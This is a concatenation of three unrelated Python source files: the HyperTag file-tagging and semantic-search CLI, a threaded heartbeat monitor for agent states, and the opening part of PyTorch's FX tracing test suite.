from __init__ import __version__
class HyperTag:
""" HyperTag CLI """
def __init__(self):
self.db = Persistor()
self.root_dir = Path(self.db.get_hypertagfs_dir())
os.makedirs(self.root_dir, exist_ok=True)
def search_image(
self, *text_queries: str, cpu=None, top_k=10, path=0, score=0, verbose=0, _return=0
):
""" Execute a semantic search that returns best matching images """
text_query = " ".join(text_queries)
try:
rpc = rpyc.connect("localhost", 18861)
results = rpc.root.search_image(text_query, path, top_k, score)
for result in results:
print(result)
if len(result) == 0:
print("No relevant files indexed...")
except ConnectionRefusedError:
from vectorizer import CLIPVectorizer
vectorizer = CLIPVectorizer(cpu, verbose)
results = vectorizer.search_image(text_query, path, top_k, score)
if _return:
return results
def index(self, text=None, image=None, rebuild=False, cache=False, cores: int = 0):
""" Vectorize image & text files (needed for semantic search) """
if (image and text is None) or (image and text) or (not image and not text):
self.index_images(rebuild)
if (text and image is None) or (image and text) or (not image and not text):
self.index_texts(rebuild, cache, cores)
def index_images(self, rebuild=False):
""" Vectorize image files (needed for semantic search) """
from vectorizer import CLIPVectorizer, get_image_files
if rebuild:
print("Rebuilding images index")
file_paths = self.db.get_vectorized_file_paths()
else:
file_paths = self.db.get_unvectorized_file_paths()
compatible_files = get_image_files(file_paths, verbose=True)
print("Vectorizing", len(compatible_files), "images...")
remote = True
if remote:
try:
rpc = rpyc.connect("localhost", 18861)
rpc._config["sync_request_timeout"] = None # Disable timeout
print("Connected to DaemonService successfully")
except ConnectionRefusedError:
print("DaemonService connection failed, falling back to local execution...")
remote = False
if not remote:
img_vectorizer = CLIPVectorizer(verbose=1)
for file_path in tqdm(compatible_files):
if remote:
img_vector = json.loads(rpc.root.encode_image(file_path))[0]
else:
img_vector = img_vectorizer.encode_image(file_path)[0].tolist()
self.db.add_file_embedding_vector(file_path, json.dumps(img_vector))
self.db.conn.commit()
print("Updating index...")
if remote:
rpc.root.update_image_index()
else:
img_vectorizer.update_index()
def index_texts(self, rebuild=False, cache=False, cores: int = 0):
""" Vectorize text files (needed for semantic search) """
# TODO: index images
# TODO: auto index on file addition (import)
from vectorizer import TextVectorizer, extract_clean_text, get_text_documents
print("Vectorizing text documents...")
remote = True
if remote:
try:
rpc = rpyc.connect("localhost", 18861)
rpc._config["sync_request_timeout"] = None # Disable timeout
print("Connected to DaemonService successfully")
except ConnectionRefusedError:
print("DaemonService connection failed, falling back to local execution...")
remote = False
if cache:
print("Caching cleaned texts (database will grow big)")
if rebuild:
print("Rebuilding texts index")
file_paths = self.db.get_vectorized_file_paths()
else:
file_paths = self.db.get_unvectorized_file_paths()
i = 0
compatible_files = get_text_documents(file_paths, verbose=True)
min_words = 5
min_word_length = 4
args = []
for file_path, file_type in compatible_files:
args.append((file_path, file_type, cache, min_words, min_word_length))
inference_tuples = []
# Preprocess using multi-processing (default uses all available cores)
if cores <= 0:
n_cores = os.cpu_count()
else:
n_cores = cores
pool = Pool(processes=n_cores)
print(f"Preprocessing texts using {n_cores} cores...")
with tqdm(total=len(compatible_files)) as t:
for file_path, sentences in pool.imap_unordered(extract_clean_text, args):
t.update(1)
if sentences:
inference_tuples.append((file_path, sentences))
print(f"Cleaned {len(inference_tuples)} text doc/s successfully")
print("Starting inference...")
# Compute embeddings
if not remote:
vectorizer = TextVectorizer(verbose=True)
for file_path, sentences in tqdm(inference_tuples):
if remote:
document_vector = json.loads(rpc.root.compute_text_embedding(json.dumps(sentences)))
else:
document_vector = vectorizer.compute_text_embedding(sentences)
if (
document_vector is not None
and type(document_vector) is list
and len(document_vector) > 0
):
self.db.add_file_embedding_vector(file_path, json.dumps(document_vector))
self.db.add_text(file_path, ". ".join([" ".join(s) for s in sentences]))
self.db.conn.commit()
i += 1
else:
print(type(document_vector))
self.db.add_file_embedding_vector(file_path, json.dumps([]))
self.db.conn.commit()
print("Failed to parse file - skipping:", file_path)
print(f"Vectorized {str(i)} file/s successfully")
print("Updating index...")
if remote:
rpc.root.update_text_index()
else:
vectorizer.update_index()
def search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Combination of token_search and semantic_search """
text_query = text_queries
token_matches = self.token_search(text_query, path, top_k, score, _return=True)
token_matches = [tm.split("/")[-1] for tm in token_matches]
results = token_matches[:5]
token_matches = token_matches[5:]
token_matches_set = set(token_matches)
semantic_matches = self.semantic_search(text_queries, path, top_k * 4, score, _return=True)
semantic_matches_set = set(semantic_matches)
intersections = token_matches_set.intersection(semantic_matches_set)
for i in token_matches:
if i in intersections:
results.append(i)
for e in token_matches:
if e not in intersections:
results.append(e)
results += semantic_matches
if _return:
return results[:top_k]
else:
for result in results[:top_k]:
print(result)
def token_search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Execute an exact token matching search that returns best matching text documents """
# text_query = " ".join(text_queries)
text_query = text_queries
# print("ST", text_query)
results = self.db.search_text(text_query, top_k=top_k)
if _return:
return results
else:
for result in results:
print(result)
def semantic_search(self, text_queries: str, path=False, top_k=10, score=False, _return=False):
""" Execute a semantic search that returns best matching text documents """
# text_query = " . ".join(text_queries)
text_query = text_queries
# print("SS", text_query)
try:
rpc = rpyc.connect("localhost", 18861)
results = rpc.root.search(text_query, path, top_k, score)
if not _return:
for result in results:
print(result)
if len(result) == 0:
print("No relevant files indexed...")
except (ConnectionRefusedError, RuntimeError):
from vectorizer import TextVectorizer
vectorizer = TextVectorizer()
results = vectorizer.search(text_query, path, top_k, score, not _return)
if _return:
return results
def add_auto_import_dir(self, path: str, index_images=False, index_texts=False):
""" Add path for auto import directory (watched by daemon) """
self.db.add_auto_import_directory(path, index_images, index_texts)
def set_hypertagfs_dir(self, path: str):
""" Set path for HyperTagFS directory """
self.db.set_hypertagfs_dir(path)
def mount(self, root_dir=None, parent_tag_id=None):
""" Generate HyperTagFS: tag representation using symlinks """
if root_dir is None:
root_dir = self.root_dir
root_path = Path(root_dir)
if parent_tag_id is None:
print("Updating HyperTagFS...")
graph()
os.makedirs(root_path / "Search Texts", exist_ok=True)
os.makedirs(root_path / "Search Images", exist_ok=True)
tag_ids_names = self.db.get_root_tag_ids_names()
parent_file_paths_names = None
else:
tag_ids_names = self.db.get_tag_id_children_ids_names(parent_tag_id)
parent_file_paths_names = set(
self.db.get_file_paths_names_by_tag_id_shallow(parent_tag_id)
)
leaf_tag_ids = {tag_id[0] for tag_id in self.db.get_leaf_tag_ids()}
dupes = dict()
for tag_id, name in tag_ids_names:
child_file_paths_names = set(self.db.get_file_paths_names_by_tag_id_shallow(tag_id))
if parent_file_paths_names is None:
file_paths_names = child_file_paths_names
else: # Intersect parent files with child
file_paths_names = parent_file_paths_names.intersection(child_file_paths_names)
if len(file_paths_names) > 0:
underscore_root_tag_path = root_path / ("_" + name)
root_tag_path = root_path / name
if not root_tag_path.exists():
os.makedirs(underscore_root_tag_path, exist_ok=True)
move(underscore_root_tag_path, root_tag_path) # Needed for daemon
symlink_path = root_tag_path
if tag_id not in leaf_tag_ids:
symlink_path = root_tag_path / "_files"
os.makedirs(symlink_path, exist_ok=True)
for file_path, file_name in file_paths_names:
try:
filepath = Path(file_path)
current_symlink_path = symlink_path / file_name
if current_symlink_path.exists() and current_symlink_path.is_symlink():
existing_target = current_symlink_path.resolve() # Get symlink target
if str(existing_target) != str(filepath): # Duplicate?
dupe_i = dupes.get(current_symlink_path)
if dupe_i is None:
dupes[current_symlink_path] = 1
dupe_i = 2
dupes[current_symlink_path] += 1
current_symlink_path = symlink_path / (f"{dupe_i}-" + file_name)
os.symlink(filepath, current_symlink_path)
except FileExistsError:
pass
self.mount(root_tag_path, tag_id)
def auto_add_tags_from_path(
self, file_path: Path, import_path_dirs: Set[str], verbose=False, keep_all=False
):
file_path_tags = [p for p in str(file_path).split("/") if p not in import_path_dirs]
if not keep_all:
file_path_tags = file_path_tags[:-1]
if verbose:
print("Inferred tags:", file_path_tags)
self.tag(
file_path,
"with",
*file_path_tags,
remount=False,
add=False,
commit=False,
)
for previous, current in zip(file_path_tags, file_path_tags[1:]):
self.metatag(current, "with", previous, remount=False, commit=False)
# print(file_path_tags, file_path.name)
def import_tags(self, import_path: str, only_tags=False, verbose=False):
"""Import files with tags inferred from existing directory hierarchy
(ignores hidden directories)"""
file_paths = [p for p in list(Path(import_path).rglob("*")) if p.is_file()]
# Remove files in hidden directories or in ignore list
ignore_list = set(self.db.get_ignore_list())
visible_file_paths = []
for p in file_paths:
is_hidden = False
for pp in str(p).split("/"):
if pp.startswith(".") or pp in ignore_list:
is_hidden = True
if not is_hidden:
visible_file_paths.append(p)
print("Adding files...")
if only_tags:
added_file_paths = visible_file_paths
else:
added_file_paths = self.add(*visible_file_paths)
import_path_dirs = set(str(Path(import_path).resolve()).split("/")[:-1])
print("import_path_dirs", import_path_dirs)
print("Adding tags...")
for file_path in tqdm(added_file_paths):
self.auto_add_tags_from_path(os.path.abspath(str(file_path)), import_path_dirs, verbose)
self.db.conn.commit()
self.mount(self.root_dir)
def remove(self, *file_names):
""" Remove files """
for file_name in tqdm(file_names):
self.db.remove_file(file_name)
remove_symlink(self.root_dir, file_name)
self.mount(self.root_dir)
def scrape(self, url, folder, timeout=1):
config.setup_config(url, folder)
wp = WebPage()
wp.get(url)
# start the saving process
wp.save_complete()
# join the sub threads
for t in wp._threads:
if t.is_alive():
t.join(timeout)
# location of the html file written
return wp.file_path
def add_url(self, url):
webpages_regex = r"\S+.html|\S+.htm|\S+.php|\S+\/[^.]+"
matches = re.findall(webpages_regex, url)
if len(matches[0]) == len(url):
web_pages_path = self.db.db_path / "web_pages"
os.makedirs(web_pages_path, exist_ok=True)
index_path = self.scrape(url, str(web_pages_path))
return index_path
else:
downloads_path = self.db.db_path / "downloads"
os.makedirs(downloads_path, exist_ok=True)
file_name = url.split("/")[-1]
file_path = downloads_path / file_name
download_url(url, file_path)
return file_path
def add(self, *paths):
""" Add file/s or URL/s"""
added = []
for path in tqdm(paths):
try:
if str(path).startswith("http"):
file_path = self.add_url(path)
self.db.add_file(os.path.abspath(file_path))
added.append(path)
elif Path(path).is_file():
self.db.add_file(os.path.abspath(path))
added.append(path)
except sqlite3.IntegrityError:
pass
self.db.conn.commit()
print("Added", len(added), "new file/s")
return added
def tags(self, *file_names):
""" Display all tags of file/s """
tags = set()
for file_name in file_names:
tags.update(set(self.db.get_tags_by_file_name(file_name)))
for tag in tags:
print(tag)
def show(self, mode="tags", path=False):
""" Display all tags (default), indexed files (mode=index) or files """
if mode == "files":
names = self.db.get_files(path)
elif mode == "index":
names = self.db.get_vectorized_file_paths(path)
elif mode == "tags":
names = self.db.get_tags()
for name in names:
print(name)
def query(self, *query, path=False, fuzzy=True, verbose=False):
"""Query files using set operands.
Supported operands:
and (intersection (default))
or (union)
minus (difference)
"""
# TODO: Parse AST to support queries with brackets
operands = {"and", "or", "minus"}
tag_val = query[0].split("=")
if len(tag_val) == 1:
tag_query, value = (query[0], None)
else:
tag_query, value = (tag_val[0], tag_val[-1])
value = value.replace("*", "%")
results = set(self.db.get_files_by_tag(tag_query, path, fuzzy, value, verbose))
current_operand = None
for query_symbol in query[1:]:
if query_symbol not in operands:
tag_val = query_symbol.split("=")
if len(tag_val) == 1:
tag_query, value = (query_symbol, None)
else:
tag_query, value = (tag_val[0], tag_val[-1])
value = value.replace("*", "%")
file_names = set(self.db.get_files_by_tag(tag_query, path, fuzzy, value, verbose))
if current_operand == "or":
results = results.union(file_names)
elif current_operand == "minus":
results = results - file_names
else:
# and (intersection) is default operand
results = results.intersection(file_names)
else:
current_operand = query_symbol
return results
def tag(self, *args, remount=True, add=True, commit=True):
""" Tag file/s with tag/s """
# Parse arguments
file_paths = []
tags = []
is_file_path = True
for arg in args:
if arg == "with":
is_file_path = False
continue
if is_file_path:
file_paths.append(arg)
else:
tag_val = arg.split("=")
if len(tag_val) == 1:
tags.append((arg, None))
else:
tags.append((tag_val[0], tag_val[-1]))
if add:
self.add(*file_paths)
# Add tags to files
for file_path in file_paths:
for tag, value in tags:
self.db.add_tag_to_file(tag, str(file_path), value)
parent_tag_ids = self.db.get_parent_tag_ids_by_name(tag)
# Add parent tags to file
for parent_tag_id in parent_tag_ids:
self.db.add_tag_to_file(parent_tag_id, str(file_path))
if commit:
self.db.conn.commit()
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
def untag(self, *args, remount=True, commit=True):
""" Untag (remove tag/s of) file/s with tag/s """
# Parse arguments
file_names = []
tags = []
is_file_name = True
for arg in args:
if arg == "with":
is_file_name = False
continue
if is_file_name:
file_names.append(arg)
else:
tags.append(arg)
# Remove tags
for file_name in file_names:
file_name = file_name.split("/")[-1]
for tag in tags:
self.db.remove_tag_from_file(tag, file_name)
# print("Tagged", file_name, "with", tags)
if commit:
self.db.conn.commit()
# TODO: Remove symlink (get all paths from metatags)
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
def metatags(self, *tag_names):
""" Display all metatags (parents) of tag/s """
tags = set()
for tag_name in tag_names:
tags.update(set(self.db.get_meta_tags_by_tag_name(tag_name)))
for tag in tags:
print(tag)
def metatag(self, *args, remount=True, commit=True):
""" Tag tag/s with tag/s """
# Parse arguments
parent_tags = []
tags = []
is_parent_tag = False
for arg in args:
if arg == "with":
is_parent_tag = True
continue
if is_parent_tag:
parent_tags.append(arg)
else:
tags.append(arg)
# Add meta tags
for tag in tags:
for parent_tag in parent_tags:
self.db.add_parent_tag_to_tag(parent_tag, tag)
# print("MetaTagged", tag, "with", parent_tags)
# Add tags to files
file_paths = self.db.get_files_by_tag(tag, show_path=True, fuzzy=True)
for file_path in file_paths:
self.db.add_tag_to_file(tag, str(file_path))
parent_tag_ids = self.db.get_parent_tag_ids_by_name(tag)
# Add parent tags to file
for parent_tag_id in parent_tag_ids:
self.db.add_tag_to_file(parent_tag_id, str(file_path))
if commit:
self.db.conn.commit()
for tag in tags:
for parent_tag in parent_tags:
# Remove parent_tag dir in all levels
remove_dir(self.root_dir, parent_tag)
# Remove tag dir in root level
try:
rmtree(self.root_dir / tag)
except Exception: # nosec
pass # Ignore if non existing
# Remount (everything is mounted)
if remount:
self.mount(self.root_dir)
def merge(self, tag_a, _into, tag_b):
""" Merges all associations (files & tags) of tag_a into tag_b """
print("Merging tag", tag_a, "into", tag_b)
self.db.merge_tags(tag_a, tag_b)
remove_dir(self.root_dir, tag_a)
self.mount(self.root_dir)
def daemon(cpu=None, text=None, image=None):
""" Start daemon process """
print("Starting up daemon...")
from .daemon import start
from multiprocessing import Process, set_start_method
set_start_method("spawn")
p = Process(target=start, args=(cpu, text, image))
p.start()
p.join()
def help():
""" Get some help on how to use HyperTag """
print(
"""
README: https://github.com/SeanPedersen/HyperTag/blob/master/README.md
Found a bug or simply feeling lost?
Do not despair, you're not alone! Let us know at https://github.com/SeanPedersen/HyperTag/issues
Chat and read about HyperTag using Matrix at https://bit.ly/2Xtz2Ff
Print available CLI functions: hypertag
Print available CLI flags for all commands: hypertag command --help
"""
)
def main():
ht = HyperTag()
fire_cli = {
"help": help,
"version": __version__,
"add": ht.add,
"remove": ht.remove,
"import": ht.import_tags,
"tag": ht.tag,
"t": ht.tag,
"untag": ht.untag,
"metatag": ht.metatag,
"tt": ht.metatag,
"merge": ht.merge,
"show": ht.show,
"tags": ht.tags,
"metatags": ht.metatags,
"query": ht.query,
"q": ht.query,
"set_hypertagfs_dir": ht.set_hypertagfs_dir,
"add_auto_import_dir": ht.add_auto_import_dir,
"mount": ht.mount,
"daemon": daemon,
"graph": graph,
"index": ht.index,
"search_image": ht.search_image,
"si": ht.search_image,
"search": ht.search,
"s": ht.search,
"semantic_search": ht.semantic_search,
"ss": ht.semantic_search,
"search_token": ht.token_search,
"st": ht.token_search,
}
fire.Fire(fire_cli)
if __name__ == "__main__":
main()
|
agent_state_manager.py
|
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import threading
# from server import STATE_UPDATE_INTERVAL, AgentState
from .agent_state import *
from common import event_manager, CommonEvent
def singleton(cls):
_instance = {}
def _singleton(*args, **kargs):
if cls not in _instance:
_instance[cls] = cls(*args, **kargs)
return _instance[cls]
return _singleton
@singleton
class AgentStateMonitor(object):
"""
代理状态监视类,为单例模式
"""
def __init__(self):
self.lock = threading.Lock() # 引入锁
self.agent_state_dict = dict()
self.__running = threading.Event()
self.__state_monitor_thread = threading.Thread(target=self.__agents_state_monitor)
agent_event = CommonEvent()
event_manager.add_event_listener(agent_event.EVENT_HEARTBEAT, self.add_new_agent_state)
def add_new_agent_state(self, event):
state_data = event.dict
agent_state = AgentState()
agent_state.gen_from_json_obj(state_data)
# self.update_agent_state(agent_state)
self.lock.acquire()
self.agent_state_dict[agent_state.agent_identifier] = agent_state
self.lock.release()
def update_agent_state(self, agent_state):
self.agent_state_dict[agent_state.agent_identifier] = agent_state
agent_state.print_state()
def start_monitor(self):
self.__running.set()
self.__state_monitor_thread.daemon = True
self.__state_monitor_thread.start()
def stop_monitor(self):
self.__running.clear()
self.agent_state_dict.clear()
def __agents_state_monitor(self):
while self.__running:
if len(self.agent_state_dict) > 0:
self.lock.acquire()
for agent_state in list(self.agent_state_dict.values()):
# agent_state.print_state()
new_state = self.__check_state(agent_state)
if new_state == "Dead":
print("Agent {0} is dead.\nAgent {1} is removed.".format(
agent_state.agent_identifier,
agent_state.agent_identifier))
# self.agent_state_dict.pop(agent_state.agent_identifier)
else:
agent_state.state = new_state
agent_state.timestamp = time.time() #更新状态的时标
agent_state.print_state()
self.agent_state_dict[agent_state.agent_identifier] = agent_state
self.lock.release()
time.sleep(5)
def __check_state(self, agent_state):
"""
根据前后两次时标对比判断代理状态,时标间隔大于2倍更新时间小于3倍更新时间时为离线,更长时间为Dead
:param agent_state: 代理状态对象
:return: 代理状态:Offline、Dead、Online
"""
last_time = time.time() - agent_state.timestamp
if STATE_UPDATE_INTERVAL * 2.0 < last_time <= STATE_UPDATE_INTERVAL * 5.0:
return "Offline"
elif last_time > STATE_UPDATE_INTERVAL * 5.0:
return "Dead"
else:
return "Online"
if __name__ == '__main__':
monitor = AgentStateMonitor()
print(id(monitor))
monitor1 = AgentStateMonitor()
print(id(monitor1))
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
